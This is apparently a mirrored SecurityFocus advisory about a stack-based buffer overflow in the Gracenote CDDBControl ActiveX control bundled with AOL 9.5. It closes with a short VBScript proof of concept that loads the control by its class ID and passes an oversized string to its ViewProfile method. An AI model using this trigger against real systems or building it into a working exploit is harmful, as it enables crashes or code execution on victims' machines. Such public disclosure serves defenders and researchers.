10 lines
No EOL
821 B
HTML
10 lines
No EOL
821 B
HTML
source: https://www.securityfocus.com/bid/37834/info
|
|
|
|
|
|
Gracenote CDDBControl is prone to a stack-based buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
|
|
|
|
An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
|
|
|
|
NOTE: The ActiveX control is included in AOL 9.5; other applications may also include the ActiveX control.
|
|
|
|
<package> <job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' /> <script language='vbscript'> arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") target.ViewProfile arg1 </script> </job> </package> |